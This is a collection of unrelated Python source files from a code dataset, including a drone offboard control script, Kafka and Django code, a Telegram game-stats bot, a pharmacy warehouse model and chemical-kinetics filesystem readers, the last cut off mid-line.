pose.position.z=15\n while(not state.connected):\n rate.sleep()\n for i in range(0,50):\n local_pub.publish(pose)\n #mavros.command.arming(True)\n #set_mode(0,'OFFBOARD')\n last_request = rospy.Time.now()\n while 1:\n if(state.mode != \"OFFBOARD\" and (rospy.Time.now()-last_request > 
rospy.Duration(5.0))):\n print(\"inside22\")\n if(set_mode(0,'OFFBOARD').success):\n print(\"Offboard enabled\")\n last_request = rospy.Time.now()\n else:\n if(not state.armed and (rospy.Time.now()-last_request > rospy.Duration(5.0))):\n if(mavros.command.arming(True)):\n print(\"vehicle armed\") \n last_request = rospy.Time.now()\n\n print(\"entered\")\n local_pub.publish(pose)\n rospy.spin()\n rate.sleep()\n return 0\n\n\nif __name__=='__main__':\n main()\n","sub_path":"catkin_ws/src/offboard/scripts/offboardX.py","file_name":"offboardX.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"568117433","text":"# -*- coding: utf-8 -*-\n# -*- Mode: Python -*-\n# vi:si:et:sw=4:sts=4:ts=4\nfrom feat.agents.base import (descriptor, replay, task)\nfrom feat.agencies.tasks import TaskState, NOT_DONE_YET\nfrom feat.common import defer\nfrom feat.interface import protocols\n\nfrom feat.test import common\n\n\nclass SomeException(Exception):\n pass\n\n\nclass BaseTestTask(task.BaseTask, common.Mock):\n\n def __init__(self, *args, **kwargs):\n task.BaseTask.__init__(self, *args, **kwargs)\n common.Mock.__init__(self)\n\n @replay.immutable\n def _get_medium(self, state):\n return state.medium\n\n\nclass AsyncTask(BaseTestTask):\n\n @replay.entry_point\n def initiate(self, state):\n return NOT_DONE_YET\n\n @replay.mutable\n def terminate(self, state, arg):\n state.medium.terminate(arg)\n\n @replay.mutable\n def fail(self, state, arg):\n state.medium.fail(arg)\n\n\nclass TimeoutTask(BaseTestTask):\n\n protocol_id = 'timeout-task'\n timeout = 1\n\n def __init__(self, *args, **kwargs):\n BaseTestTask.__init__(self, *args, **kwargs)\n\n @common.Mock.stub\n def expired(self):\n pass\n\n @common.Mock.record\n def initiate(self):\n d = defer.Deferred()\n return d\n\n\nclass DummyException(Exception):\n pass\n\n\nclass ErrorTask(BaseTestTask):\n\n protocol_id = 'error-task'\n\n def __init__(self, *args, **kwargs):\n BaseTestTask.__init__(self, *args, **kwargs)\n\n @common.Mock.record\n def initiate(self):\n raise DummyException('ErrorTask')\n\n\nclass SuccessTask(BaseTestTask):\n\n protocol_id = 'success-task'\n\n def __init__(self, *args, **kwargs):\n BaseTestTask.__init__(self, *args, **kwargs)\n\n @common.Mock.stub\n def initiate(self):\n pass\n\n\n@common.attr(timescale=0.05)\nclass TestTask(common.TestCase, common.AgencyTestHelper):\n\n protocol_type = \"Task\"\n\n @defer.inlineCallbacks\n def setUp(self):\n yield common.TestCase.setUp(self)\n yield common.AgencyTestHelper.setUp(self)\n desc = yield self.doc_factory(descriptor.Descriptor)\n self.agent = yield self.agency.start_agent(desc)\n self.finished = None\n\n def start_task(self, t):\n self.task = self.agent.initiate_protocol(t)\n self.finished = self.task.notify_finish()\n\n def tearDown(self):\n return self.finished\n\n def assertState(self, _, state):\n self.assertFalse(self.task._get_medium().guid in\n self.agent._protocols)\n self.assertEqual(state, self.task._get_medium().state)\n return self.finished\n\n def assertTimeout(self, _):\n self.assertState(_, TaskState.expired)\n self.assertCalled(self.task, 'expired', times=1)\n\n def testInitiateTimeout(self):\n self.start_task(TimeoutTask)\n d = self.cb_after(arg=None, obj=self.task._get_medium(),\n method=\"_terminate\")\n d.addCallback(self.assertTimeout)\n self.assertFailure(self.finished, protocols.ProtocolExpired)\n return d\n\n def testInitiateError(self):\n self.start_task(ErrorTask)\n d = 
self.cb_after(arg=None, obj=self.agent,\n method=\"unregister_protocol\")\n d.addCallback(self.assertState, TaskState.error)\n self.assertFailure(self.finished, DummyException)\n return d\n\n def testInitiateSuccess(self):\n self.start_task(SuccessTask)\n d = self.cb_after(arg=None, obj=self.agent,\n method=\"unregister_protocol\")\n d.addCallback(self.assertState, TaskState.completed)\n return d\n\n @defer.inlineCallbacks\n def testWaitForState(self):\n self.start_task(TimeoutTask)\n yield self.task._get_medium().wait_for_state(TaskState.expired)\n self.assertFailure(self.finished, protocols.ProtocolExpired)\n self.assertEqual(TaskState.expired, self.task._get_medium().state)\n\n @defer.inlineCallbacks\n def testRetryingProtocol(self):\n d = self.cb_after(None, self.agent, 'initiate_protocol')\n task = self.agent.retrying_protocol(ErrorTask, max_retries=3)\n self.finished = task.notify_finish()\n yield d\n self.assertEqual(task.attempt, 1)\n yield self.cb_after(None, self.agent, 'initiate_protocol')\n yield self.cb_after(None, self.agent, 'initiate_protocol')\n yield self.cb_after(None, self.agent, 'initiate_protocol')\n self.assertEqual(task.attempt, task.max_retries+1)\n self.assertFailure(self.finished, DummyException)\n\n @defer.inlineCallbacks\n def testAsyncTasks(self):\n self.start_task(AsyncTask)\n self.assertFalse(self.task.finished())\n d = self.task.notify_finish()\n self.task.terminate('result')\n res = yield d\n self.assertEqual('result', res)\n self.assertTrue(self.task.finished())\n\n self.start_task(AsyncTask)\n self.assertFailure(self.finished, SomeException)\n self.task.fail(SomeException('result'))\n yield self.finished\n","sub_path":"src/feat/test/test_agencies_emu_tasks.py","file_name":"test_agencies_emu_tasks.py","file_ext":"py","file_size_in_byte":5010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"650274718","text":"from kafka import KafkaProducer\nimport json\n\nimport time\nfrom kafka.errors import KafkaError\n\ndef get_data(i):\n \n return {\"First number\":i,\n \"second number\":i\n }\n\n\n# def json_serializer(data):\n# return json.dumps(data).encode(\"utf-8\")\n\nproducer = KafkaProducer(bootstrap_servers=['127.0.0.1:9092'],\n value_serializer=lambda v: json.dumps(v).encode('utf-8'))\n \ndef on_send_success(record_metadata):\n print(record_metadata.topic)\n print(record_metadata.partition)\n print(record_metadata.offset)\n\ndef on_send_error(excp):\n log.error('I am an errback', exc_info=excp)\n # handle exception\ntopic=\"Data_Topic\"\n\nif __name__ == \"__main__\":\n i=0\n while 1 == 1:\n \n data = get_data(i)\n key=bytes(\"key_\"+str(i), encoding='utf-8')\n \n producer.send(topic=topic,key=key, value=data).add_callback(on_send_success).add_errback(on_send_error)\n #producer.send(\"Data_Topic\", data).add_both(add_callback=on_send_success,add_errback=on_send_error)\n \n i=i+1\n time.sleep(4)","sub_path":"kafkapy/producerwithkeys.py","file_name":"producerwithkeys.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"626003530","text":"#\n# Copyright (c) SAS Institute Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is 
distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n\nfrom django.conf.urls.defaults import patterns\nfrom mint.django_rest.rbuilder.images.views.v1 import views as imagesviews\nfrom mint.django_rest import urls\n\nURL = urls.URLRegistry.URL\n\nurlpatterns = patterns('',\n    URL(r'/?$',\n        imagesviews.ImageTypesService(),\n        name='ImageTypes',\n        model='images.ImageTypes'),\n    URL(r'/(?P\\d+)/?$',\n        imagesviews.ImageTypeService(),\n        name='ImageType',\n        model='images.ImageType')\n)\n","sub_path":"mint/django_rest/rbuilder/images/views/v1/urls_image_types.py","file_name":"urls_image_types.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"5070262","text":"num1 = int(input(\"num1\"))\r\nnum2 = int(input(\"num2\"))\r\nnum3 = int(input(\"num3\"))\r\n\r\n# Print the largest of the three numbers; the original nested/elif chain\r\n# printed nothing for inputs such as 2, 1, 3, so each branch now checks\r\n# its candidate against both of the other numbers.\r\nif num1 > num2 and num1 > num3:\r\n    print(num1)\r\nelif num2 > num1 and num2 > num3:\r\n    print(num2)\r\nelif num3 > num1 and num3 > num2:\r\n    print(num3)\r\nelse:\r\n    print(\"Please enter different numbers\")","sub_path":"lab3/example2.py","file_name":"example2.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"258546242","text":"#!/usr/bin/python\n# coding=utf-8\n\nimport sys\nimport time\nimport sqlite3\nimport telepot\nfrom API_Parsing import *\n\nfrom tkinter import *\nfrom pprint import pprint\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport re\nfrom datetime import date, datetime, timedelta\nimport traceback\n\nimport noti\n\nparseEngine = RiotApiParsing()\nChampionIDDict = {}\ndef replyMatchesData(user, name):\n    \n    print(user, name)\n    ID = parseEngine.getPlayerIDByName(name)#[0] id, [1] accId\n    Data = parseEngine.getMatchsByAccountID(ID[1],None,None, beginIndex= 0, endIndex = 3).get('matches')\n    for i in Data:\n        championID = i.get('champion')\n        gameId = i.get('gameId')\n        tempData = parseEngine.getMatchByGameID(gameId)\n        participant = tempData.get(\"participantIdentities\")\n        participantId = 0\n        for j in participant:\n            p = j.get(\"player\")\n            if(p.get(\"accountId\") == ID[1]):\n                participantId = j.get(\"participantId\")\n                break;\n        participant = tempData.get(\"participants\")\n        stats = {}\n        for j in participant:\n            if(j.get(\"participantId\") == participantId):\n                stats = j.get(\"stats\")\n                break;\n        kills = stats.get(\"kills\")\n        assists = stats.get(\"assists\")\n        win = stats.get(\"win\")\n        deaths = stats.get(\"deaths\")\n\n        msg = ''\n        if(win):\n            msg += 'WIN\\n' \n        else:\n            msg += 'LOSE\\n' \n        msg += 'champion : ' + ChampionIDDict[championID] + '\\n'\n        msg += 'kills : ' + str(kills) + '\\n'\n        msg += 'assists : ' + str(assists) + '\\n'\n        msg += 'deaths : ' + str(deaths) + '\\n'\n        noti.sendMessage( user, msg )\n\ndef replyRankData(user, name):\n    \n    print(user, name)\n    ID = parseEngine.getPlayerIDByName(name)#[0] id, [1] accId\n    Data = parseEngine.getPlayerLeagueByPlayerID(ID[0])\n    for i in Data:\n        msg = ''\n        msg += 'queueType : ' + i.get('queueType') + '\\n'\n        msg += 'tier : ' + i.get('tier') + '\\n'\n        msg += 'rank : ' + i.get('rank') + '\\n'\n        msg += 'leaguePoints : ' + str(i.get('leaguePoints')) + '\\n'\n        msg += 'wins : ' + str(i.get('wins')) + '\\n'\n        msg += 'losses : ' + str(i.get('losses'))\n        noti.sendMessage( user, msg )\n    \ndef 
replyMasteryData(user, name):\n \n print(user, name)\n ID = parseEngine.getPlayerIDByName(name)#[0] id, [1] accId\n Data = parseEngine.getChampionMasteryByPlayerID(ID[0])\n for i in range(3):\n msg = ''\n msg += 'Top' + str(i+1) + '\\n'\n msg += 'champion : ' + ChampionIDDict[Data[i].get('championId')] + '\\n'\n msg += 'championLevel : ' + str(Data[i].get('championLevel')) + '\\n'\n msg += 'championPoints : ' + str(Data[i].get('championPoints'))\n noti.sendMessage( user, msg )\n \n\ndef check( user ):\n conn = sqlite3.connect('users.db')\n cursor = conn.cursor()\n cursor.execute('CREATE TABLE IF NOT EXISTS users( user TEXT, location TEXT, PRIMARY KEY(user, location) )')\n cursor.execute('SELECT * from users WHERE user=\"%s\"' % user)\n for data in cursor.fetchall():\n row = 'id:' + str(data[0]) + ', location:' + data[1]\n noti.sendMessage( user, row )\n\n\ndef handle(msg):\n content_type, chat_type, chat_id = telepot.glance(msg)\n if content_type != 'text':\n noti.sendMessage(chat_id, '난 텍스트 이외의 메시지는 처리하지 못해요.')\n return\n\n text = msg['text']\n args = text.split(' ')\n if text.startswith('전적') and len(args)>1:\n print('try to 전적', args[1])\n replyMatchesData( chat_id, args[1] )\n elif text.startswith('랭크') and len(args)>1:\n print('try to 랭크', args[1])\n replyRankData( chat_id, args[1] )\n elif text.startswith('모스트') and len(args)>1:\n print('try to 모스트', args[1])\n replyMasteryData( chat_id, args[1] )\n elif text.startswith('확인'):\n print('try to 확인')\n check( chat_id )\n else:\n noti.sendMessage(chat_id, \"\"\"모르는 명령어입니다.\\n전적 '유저이름'\\n랭크 '유저이름'\\n모스트 '유저이름'\"\"\")\n\ndef start():\n temp = (parseEngine.getAllChampionsData()).items()\n for i in temp:\n ChampionIDDict[int(i[1]['key'])] = i[0]\n\n window = Tk()\n window.title(\"League Of Legends Search\")\n window.geometry(\"250x400\")\n window.resizable(False, False)\n\n today = date.today()\n current_month = today.strftime('%Y%m')\n TEXT = ''\n TEXT += '[' + str(today) + ']received token :\\n' + noti.TOKEN + '\\n'\n \n state = Label(window, text = TEXT)\n state.pack()\n\n bot = telepot.Bot(noti.TOKEN)\n\n printMessage(state, TEXT, str(bot.getMe()))\n\n bot.message_loop(handle)\n\n printMessage(state, TEXT, 'Listening...')\n \n window.mainloop()\n \n while 1:\n time.sleep(10)\n\ndef printMessage(label, Str, Message):\n Str += Message + '\\n'\n label.configure(text = Str)","sub_path":"Python_TermProject/Python_TermProject/teller.py","file_name":"teller.py","file_ext":"py","file_size_in_byte":5193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"306922159","text":"from html.parser import HTMLParser\nimport re\n\nclass MyHTMLParser(HTMLParser):\n def __init__(self):\n HTMLParser.__init__(self)\n self.start_tag = \"\"\n self.end_tag = \"\"\n self.data = []\n self.hashtags = []\n self.metakeywords = []\n\n def handle_starttag(self, tag, attrs):\n self.start_tag = tag\n if tag == \"meta\":\n if len(attrs)>=2 and 'keyword' in attrs[0] and 'content' in attrs[1]:\n keys = self.clean_data(attrs[1][1])\n self.metakeywords.extend(keys.split())\n \n def handle_endtag(self, tag):\n self.end_tag = tag\n\n def handle_data(self, data):\n if self.start_tag == self.end_tag and self.start_tag != \"script\":\n data = self.clean_data(data)\n tags = re.findall(\"(#[A-Za-z0-9_-]+)\", data)\n if tags:\n self.hashtags.extend(tags)\n if data:\n self.data.append(data)\n \n def clean_data(self, data):\n data = data.strip()\n data = re.sub(\"[(){}.,|>'+*~]\", '', data)\n data = re.sub(r'\"', '', data)\n data = 
re.sub(\"([0-9-]+)\", '', data)\n data = \" \".join(data.split())\n return data","sub_path":"crawler/MyHTMLParser.py","file_name":"MyHTMLParser.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"93659212","text":"from django.shortcuts import render, get_object_or_404\nfrom .models import Poem\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n# Create your views here.\ndef index(request):\n\tpoems_list = Poem.objects.all()\n\tpaginator = Paginator(poems_list, 15)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tpoems = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tpoems = paginator.page(1)\n\texcept EmptyPage:\n\t\tpoems = paginator.page(paginator.num_pages)\n\treturn render(request, \"poem/index.html\", {'poems': poems})\n\ndef detail(request, id):\n\tpoem = get_object_or_404(Poem, pk=id)\n\tlines = poem.format_body()\n\tprint(lines)\n\treturn render(request, \"poem/detail.html\", {'poem': poem, 'lines': lines})","sub_path":"poem/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"66505253","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom medicplus.models import *\n\n# Create your models here.\n\nstates = (('DRAFT', 'DRAFT'),\n ('VALIDATED', 'VALIDATED'),)\nreceipt_types = (('RC', 'Goods Receipt'),\n ('RT', 'Returns'),\n ('CR', 'Corrections'),\n ('TR', 'Transfers'),)\n\n\nclass Vendor(models.Model):\n name = models.CharField(max_length=100)\n phone = models.CharField(max_length=70)\n address = models.CharField(max_length=70)\n city = models.CharField(max_length=70)\n state = models.CharField(max_length=70)\n country = models.ForeignKey(Countries, on_delete=models.PROTECT)\n location = models.ForeignKey(ServiceCentre, on_delete=models.PROTECT, null=True)\n active = models.BooleanField(default=True)\n\n class Meta:\n db_table = 'vendor'\n ordering = ['name']\n\n def __str__(self):\n return self.name\n\n\nclass drug_lot(models.Model):\n vendor = models.ForeignKey(Vendor, on_delete=models.PROTECT, null=True)\n drug = models.ForeignKey(Drugs, on_delete=models.PROTECT)\n barcode = models.CharField(max_length=100, null=True)\n name = models.CharField(max_length=20)\n expiration_date = models.DateField()\n # removal_date = models.DateField()\n active = models.BooleanField(default=True)\n last_changed_by = models.ForeignKey(User, on_delete=models.PROTECT)\n last_changed_at = models.DateField(auto_now=True)\n\n class Meta:\n db_table = 'drug_lot'\n ordering = ['-id']\n\n def __str__(self):\n return self.name\n\n\nclass StockReceipt(models.Model):\n vendor = models.ForeignKey(Vendor, on_delete=models.PROTECT, null=True)\n reference = models.CharField(max_length=50, null=True) # internal ref\n created_by = models.ForeignKey(User, on_delete=models.PROTECT)\n create_date = models.DateTimeField(auto_now_add=True, auto_now=False)\n last_change_by = models.ForeignKey(User, related_name='last_changed_by', on_delete=models.PROTECT, null=True)\n last_changed = models.DateTimeField(auto_now=True, auto_now_add=False) # Changed auto_now_add from True to False\n validated_by = models.ForeignKey(User, related_name='validated_by', on_delete=models.PROTECT, null=True)\n validated_on = models.DateTimeField(auto_now=False, auto_now_add=False, null=True)\n source = models.ForeignKey(ServiceCentre, on_delete=models.DO_NOTHING, 
null=True, related_name=\"medicplus_warehouse_StockReceipt\")\n location = models.ForeignKey(ServiceCentre, on_delete=models.CASCADE, null=True, related_name=\"medicplus_warehouse_Location\")\n status = models.CharField(max_length=30, choices=states, default='DRAFT')\n receipt_type = models.CharField(max_length=10, choices=receipt_types, null=True)\n parent_id = models.ForeignKey('self', blank=True, null=True, related_name='children', on_delete=models.PROTECT)\n invoiced = models.BooleanField(default=0)\n invoice_number = models.CharField(max_length=200)\n totalCost = models.FloatField(null=True)\n\n class Meta:\n db_table = 'stock_receipt'\n\n def __str__(self):\n try:\n return self.vendor.name\n except:\n return self.source.name\n\n def v_date(self):\n try:\n return self.validated_on.strftime(\"%d/%m/%Y\")\n except:\n pass\n \n def c_date(self):\n try:\n return self.create_date.strftime(\"%d/%m/%Y\")\n except:\n pass\n\n\nclass StockReceiptLine(models.Model):\n drug = models.ForeignKey(Drugs, on_delete=models.PROTECT)\n lot = models.ForeignKey(drug_lot, on_delete=models.PROTECT)\n uom_quantity = models.DecimalField(max_digits=10, decimal_places=2, null=True)\n quantity = models.DecimalField(max_digits=10, decimal_places=2)\n unitPrice = models.DecimalField(max_digits=10, decimal_places=2)\n uomPrice = models.DecimalField(max_digits=10, decimal_places=2, null=True)\n totalValue = models.DecimalField(max_digits=10, decimal_places=2)\n uom = models.ForeignKey('DrugUom', on_delete=models.CASCADE, null=True)\n stockReceipt = models.ForeignKey(StockReceipt, on_delete=models.PROTECT)\n\n class Meta:\n db_table = 'stock_receipt_line'\n\n def __str__(self):\n return self.drug.name\n\n\nclass DrugReceipt(models.Model):\n vendor = models.ForeignKey(Vendor, on_delete=models.PROTECT, null=True)\n drug = models.ForeignKey(Drugs, on_delete=models.PROTECT)\n lot = models.ForeignKey(drug_lot, on_delete=models.PROTECT)\n type = models.CharField(max_length=10, choices=receipt_types)\n stockReceiptLine = models.ForeignKey(StockReceiptLine, on_delete=models.PROTECT)\n source = models.ForeignKey(ServiceCentre, on_delete=models.PROTECT, null=True)\n destination = models.ForeignKey(ServiceCentre, on_delete=models.PROTECT, related_name=\"destination\", null=True)\n quantity = models.FloatField()\n unitPrice = models.FloatField()\n when = models.DateTimeField(auto_now_add=True)\n\n def save(self, *args, **kwargs):\n db_qty = 0\n db_qty2 = 0\n try:\n db_qty = DrugBatch.objects.get(drug_lot=self.lot.id,service_centre_id=self.source.id).quantity\n db_qty2 = DrugBatch.objects.get(drug_lot=self.lot.id,service_centre_id=self.destination.id).quantity\n except:\n pass\n loc1 = self.source.id\n loc2 = self.destination.id\n qty1 = db_qty + (self.quantity * -1)\n qty2 = db_qty2 + self.quantity\n iterate = {loc1: qty1, loc2: qty2}\n\n for x, y in iterate.items():\n params = {'name': self.lot.name, 'quantity': y, 'expiration_date': self.lot.expiration_date,'drug_id':self.drug.id,'unit_price': self.unitPrice}\n updated, created = DrugBatch.objects.update_or_create(defaults=params,drug_lot=self.lot.id, service_centre_id= x)\n \n super(DrugReceipt, self).save(*args, **kwargs)\n\n def when_display(self):\n return self.when.strftime(\"%d/%m/%Y\")\n\n class Meta:\n db_table = 'drug_receipt'\n\n\nclass DrugUomCategory(models.Model):\n name = models.CharField(max_length=50)\n\n class Meta:\n db_table = 'drug_uom_category'\n verbose_name = 'DrugUomCategory'\n verbose_name_plural = 'DrugUomCategories'\n\n def __str__(self):\n return 
self.name\n\n\nclass DrugUom(models.Model):\n    name = models.CharField(max_length=50)\n    category = models.ForeignKey(DrugUomCategory, on_delete=models.CASCADE)\n    conversion_rate = models.DecimalField(max_digits=10, decimal_places=2)\n    drug = models.ForeignKey(Drugs, on_delete=models.CASCADE)\n\n    class Meta:\n        db_table = 'drug_uom'\n        verbose_name = 'DrugUom'\n        verbose_name_plural = 'DrugUom'\n\n    def __str__(self):\n        return self.name\n","sub_path":"medicplus_warehouse/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"532852686","text":"import os\nimport subprocess\nimport sys\n\nfrom pyserini.search import get_qrels\nfrom pyserini.util import download_evaluation_script\n\nscript_path = download_evaluation_script('trec_eval')\ncmd_prefix = ['java', '-jar', script_path]\nargs = sys.argv\nif len(args) > 1:\n    cmd = cmd_prefix + args[1:]\n    if not os.path.exists(cmd[-2]):\n        cmd[-2] = get_qrels(cmd[-2])\nelse:\n    cmd = cmd_prefix\nprint(f'Running command: {cmd}')\nprocess = subprocess.Popen(cmd,\n                           stdout=subprocess.PIPE,\n                           stderr=subprocess.PIPE)\nstdout, stderr = process.communicate()\nif stderr:\n    print('Results:')\n    print(stderr.decode(\"utf-8\"))\nelse:\n    print(stdout.decode(\"utf-8\"))\n","sub_path":"pyserini/eval/trec_eval.py","file_name":"trec_eval.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"42402725","text":"\n\n\nheight = float(input(\"Height: \"))\nweight = int(input(\"Weight: \"))\n\nif height > 3:\n    raise ValueError(\"human height shouldn't be over 3 meters\")\n\n# BMI is weight in kilograms divided by height in metres squared\nbmi = weight / height ** 2\nprint(bmi)\n\n\n# IndexError handling example\nfruits = [\"Apple\", \"Pear\", \"Orange\"]\n\ndef make_pie(index):\n    try:\n        fruit = fruits[index]\n    except IndexError:\n        print(\"Fruit pie\")\n    else:\n        print(fruit + \" pie\")\n\nmake_pie(4)\n","sub_path":"randoms/20210824_BMIraiseError.py","file_name":"20210824_BMIraiseError.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"633087046","text":"\"\"\"\n    Read the save filesystem for all of the required information specified by\n    (1) the models specified for partition function and\n    (2) the electronic structure levels\n    in order to write portions of MESS strings for species and reaction paths\n    and calculate electronic and zero-point vibrational energies.\n\"\"\"\n\nimport autofile\nfrom routines.pf.models import ene\nfrom routines.pf.models import typ\nfrom routines.pf.models import _rot as rot\nfrom routines.pf.models import _tors as tors\nfrom routines.pf.models import _sym as sym\nfrom routines.pf.models import _vib as vib\nfrom routines.pf.models import _fs as fs\nfrom routines.pf.models import _util as util\nfrom lib.phydat import phycon\n\n\n# General readers\ndef read_spc_data(spc_dct_i, spc_name,\n                  chn_pf_models, chn_pf_levels,\n                  run_prefix, save_prefix,\n                  ref_pf_models=(), ref_pf_levels=()):\n    \"\"\" Determines which block writer to use\n    \"\"\"\n    print(('\\n++++++++++++++++++++++++++++++++++++++++++++++++' +\n           '++++++++++++++++++++++++++++++++++++++'))\n    print('\\nReading filesystem info for {}'.format(spc_name))\n\n    vib_model, tors_model = chn_pf_models['vib'], chn_pf_models['tors']\n    if typ.is_atom(spc_dct_i):\n        inf_dct = atm_data(\n            spc_dct_i,\n            chn_pf_models, chn_pf_levels,\n            ref_pf_models, ref_pf_levels,\n            run_prefix, 
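# the run/save prefixes locate the autofile RUN and SAVE filesystem trees\n            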
save_prefix)\n writer = 'atom_block'\n else:\n if vib_model == 'tau' or tors_model == 'tau':\n inf_dct = tau_data(\n spc_dct_i,\n chn_pf_models, chn_pf_levels,\n run_prefix, save_prefix, saddle=False)\n writer = 'tau_block'\n else:\n inf_dct = mol_data(\n spc_dct_i,\n chn_pf_models, chn_pf_levels,\n ref_pf_models, ref_pf_levels,\n run_prefix, save_prefix, saddle=False, tors_wgeo=True)\n writer = 'species_block'\n\n # Add writer to inf dct\n inf_dct['writer'] = writer\n\n return inf_dct\n\n\ndef read_ts_data(spc_dct_i, tsname,\n chn_pf_models, chn_pf_levels,\n run_prefix, save_prefix,\n ts_class, ts_sadpt, ts_nobarrier,\n ref_pf_models=(), ref_pf_levels=()):\n \"\"\" Determine which block function to useset block functions\n \"\"\"\n\n print(('\\n++++++++++++++++++++++++++++++++++++++++++++++++' +\n '++++++++++++++++++++++++++++++++++++++'))\n print('\\nReading filesystem info for {}'.format(tsname))\n\n # Get all of the information for the filesystem\n if not typ.var_radrad(ts_class):\n # Build MESS string for TS at a saddle point\n if ts_nobarrier == 'pst':\n inf_dct = {}\n writer = 'pst_block'\n elif ts_sadpt == 'rpvtst':\n inf_dct = {}\n writer = 'vtst_saddle_block'\n else:\n inf_dct = mol_data(\n spc_dct_i,\n chn_pf_models, chn_pf_levels,\n ref_pf_models, ref_pf_levels,\n run_prefix, save_prefix, saddle=True, tors_wgeo=True)\n writer = 'species_block'\n else:\n # Build MESS string for TS with no saddle point\n if ts_nobarrier == 'pst':\n inf_dct = {}\n writer = 'pst_block'\n elif ts_nobarrier == 'rpvtst':\n inf_dct = {}\n writer = 'vtst_no_saddle_block'\n elif ts_nobarrier == 'vrctst':\n inf_dct = flux_data()\n writer = 'vrctst_block'\n\n # Add writer to inf dct\n inf_dct['writer'] = writer\n\n return inf_dct\n\n\n# Data Readers\ndef atm_data(spc_dct_i,\n chn_pf_models, chn_pf_levels, ref_pf_models, ref_pf_levels,\n run_prefix, save_prefix):\n \"\"\" Pull all neccessary info for the atom\n \"\"\"\n\n # Set up all the filesystem objects using models and levels\n pf_filesystems = fs.pf_filesys(\n spc_dct_i, chn_pf_levels, run_prefix, save_prefix, False)\n\n print('\\nObtaining the geometry...')\n geom = rot.read_geom(pf_filesystems)\n\n print('\\nObtaining the electronic energy...')\n ene_chnlvl = ene.read_energy(\n spc_dct_i, pf_filesystems, chn_pf_models, chn_pf_levels,\n read_ene=True, read_zpe=False)\n\n ene_reflvl = None\n _, _ = ref_pf_models, ref_pf_levels\n zpe_chnlvl = None\n\n # Create info dictionary\n inf_dct = {\n 'geom': geom,\n 'sym_factor': 1.0,\n 'freqs': [],\n 'mess_hr_str': '',\n 'mass': util.atom_mass(spc_dct_i),\n 'elec_levels': spc_dct_i['elec_levels'],\n 'ene_chnlvl': ene_chnlvl,\n 'ene_reflvl': ene_reflvl,\n 'zpe_chnlvl': zpe_chnlvl\n }\n\n return inf_dct\n\n\ndef mol_data(spc_dct_i,\n chn_pf_models, chn_pf_levels, ref_pf_models, ref_pf_levels,\n run_prefix, save_prefix, saddle=False, tors_wgeo=True):\n \"\"\" Pull all of the neccessary information from the filesystem for a species\n \"\"\"\n\n # Initialize all of the elements of the inf dct\n geom, sym_factor, freqs, imag, elec_levels = None, None, None, None, None\n allr_str, mdhr_dat = '', ''\n xmat, rovib_coups, rot_dists = None, None, None\n\n # Set up all the filesystem objects using models and levels\n pf_filesystems = fs.pf_filesys(\n spc_dct_i, chn_pf_levels, run_prefix, save_prefix, saddle)\n\n # Set information for transition states\n frm_bnd_keys, brk_bnd_keys = util.get_bnd_keys(pf_filesystems, saddle)\n rxn_class = util.set_rxn_class(spc_dct_i, saddle)\n\n # Obtain rotor information used to determine 
new information\n print('\\nPreparing internal rotor info building partition functions...')\n rotors = tors.build_rotors(\n spc_dct_i, pf_filesystems, chn_pf_models, chn_pf_levels,\n rxn_class=rxn_class,\n frm_bnd_keys=frm_bnd_keys, brk_bnd_keys=brk_bnd_keys,\n tors_geo=tors_wgeo)\n\n if typ.nonrigid_tors(chn_pf_models, rotors):\n run_path = fs.make_run_path(pf_filesystems, 'tors')\n tors_strs = tors.make_hr_strings(\n rotors, run_path, chn_pf_models['tors'])\n [allr_str, hr_str, _, prot_str, mdhr_dat] = tors_strs\n\n # Obtain rotation partition function information\n print('\\nObtaining info for rotation partition function...')\n geom = rot.read_geom(pf_filesystems)\n\n if typ.nonrigid_rotations(chn_pf_models):\n rovib_coups, rot_dists = rot.read_rotational_values(pf_filesystems)\n\n # Obtain vibration partition function information\n print('\\nObtaining the vibrational frequencies and zpves...')\n if typ.nonrigid_tors(chn_pf_models, rotors):\n freqs, imag, zpe, _ = vib.tors_projected_freqs_zpe(\n pf_filesystems, hr_str, prot_str, saddle=saddle)\n if 'mdhrv' in chn_pf_models['tors']:\n freqs = ()\n else:\n freqs, imag, zpe = vib.read_harmonic_freqs(\n pf_filesystems, saddle=saddle)\n\n if typ.anharm_vib(chn_pf_models):\n xmat = vib.read_anharmon_matrix(pf_filesystems)\n\n # Obtain symmetry factor\n print('\\nDetermining the symmetry factor...')\n sym_factor = 